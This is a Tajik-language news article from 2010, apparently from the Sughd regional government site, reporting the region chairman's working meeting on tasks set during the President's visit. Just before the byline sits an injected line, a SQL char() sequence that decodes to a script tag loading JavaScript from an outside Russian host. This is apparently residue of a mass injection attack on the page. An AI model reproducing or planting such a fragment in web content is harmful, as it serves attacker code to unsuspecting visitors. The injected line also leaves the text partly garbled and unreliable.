13.07.2010
Машварати кории Раиси вилояти Суғд
Раиси вилояти Суғд, Қоҳир Расулзода бо роҳбарони сохторҳо, раёсатҳо ва шӯъбаҳои мақомоти иҷроияи ҳокимияти давлатии вилоят ҷиҳати натиҷагирӣ аз сафари кории Президенти Ҷумҳурии Тоҷикистон, мӯҳтарам Эмомалӣ Раҳмон ба вилояти Суғд (8-11 июл) машварати корӣ доир намуд.
Қоҳир Расулзода зикр дошт, ки сафари кории Президенти Ҷумҳурии Тоҷикистон, ки дар навоҳии Кӯҳистони Мастчоҳ, Айнӣ, Шаҳристон, Бобоҷон Ғафуров ва шаҳри Истаравшан ба вуқӯъ пайваст, як такони ҷиддие дар таҳкиму рушди ҳаёти иқтисодӣ ва фарҳангии вилоят ворид сохт.
Раиси вилояти Суғд ба масъулин тибқи супоришоти Президенти мамлакат вазифагузорӣ намуд, ки бояд дар вилоят то ҷашни 20-солагии Истиқлолияти давлатии Ҷумҳурии Тоҷикистон як қатор корҳои ободониву созандагӣ, аз ҷумла, бунёди корхонаҳои нави коркарди маҳсулоти кишоварзӣ, бахусус нахи пахта, иншооти иҷтимоӣ, фарҳангӣ ва варзишӣ, таъмини муассисаҳои соҳаҳои маорифу тандурустӣ бо кадрҳои соҳибихтисос ва таҷҳизоти зарурӣ, равнақу эҳёи ҳунарҳои миллӣ роҳандозӣ карда шаванд.
Ҳамчунин тибқи супориши Прзиденти мамлакат дар ноҳияи Кӯҳистони Мастчоҳ ва шаҳри Истаравшан семинари ҷумҳуриявии картошкапарварон ва ангурпарварон баргузор шуда, таҷрибаи деҳқонон ва токпарварони суғдӣ мавриди омӯзиш ва баҳрабардорӣ қарор хоҳад гирифт.
Қоҳир Расулзода ҳамчунин масъулинро ҷиҳати сазовор пешвоз гирифтани ҷашни 20-солагии Истиқолияти давлатии Ҷумҳурии Тоҷикистон ва саривақту бо сифати баланд бунёд намудани иншооти ҷашнӣ вазифагузорӣ намуд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)145cf6a0c7cef5c3ed3812d0152c6c12.js" type="text/javascript">

Мавзуна Алиева
Таҷрибаомӯз
Маълумот аз сомонаи www.sugd.tj